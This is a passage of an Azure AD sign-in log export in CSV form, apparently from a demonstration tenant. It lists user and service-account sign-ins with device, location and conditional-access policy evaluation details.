'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8ad00b2e-7523-45f8-a6db-5c47f2391300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ad00b2e-7523-45f8-a6db-5c47f2391300,SigninLogs,Sucess,33.7984581,-84.38828278
+1462,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb8f781f-c56e-42db-aeba-fdc20eacd4b1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d6103972-d51f-4bff-802b-f4401a4e1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d6103972-d51f-4bff-802b-f4401a4e1200,SigninLogs,Sucess,36.6404686,-78.26995087
+1463,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:59.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90d9072a-3b67-4ee2-9b68-dd53dc1c7f8b,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",2903ae2d-5f7e-48a4-9564-1a66c0af1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2903ae2d-5f7e-48a4-9564-1a66c0af1200,SigninLogs,Sucess,38.73078156,-78.17196655
+1464,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:38.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ff8e03d-b216-421d-9643-ffa85998969c,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",11779f6a-e330-484b-9e89-76d9fe831500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,11779f6a-e330-484b-9e89-76d9fe831500,SigninLogs,Sucess,38.73078156,-78.17196655
+1465,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:07.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bc9bf6d9-49c4-460c-b943-497c13889088,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-059379531200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,80d584c4-dd35-4dcb-882c-059379531200,SigninLogs,Sucess,33.7984581,-84.38828278
+1466,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:32.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,11d8993d-d314-42ae-a023-502a3e169f79,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4aca3199-2681-43b9-9160-589cddfd1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aca3199-2681-43b9-9160-589cddfd1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1467,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:56.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0d941348-ac6d-40cb-983c-21b88a514e67,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",9cf72c2b-aa6a-41ec-adc7-3fa2b7b90a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9cf72c2b-aa6a-41ec-adc7-3fa2b7b90a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1468,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6b60009d-1a15-4140-83fe-b72956b00dba,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e514610600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,65ce963c-c870-4311-8389-19e514610600,SigninLogs,Sucess,50.6406517,5.572050095
+1469,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc35a1b5-e554-49f6-85a5-b8adecf8d4ba,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': 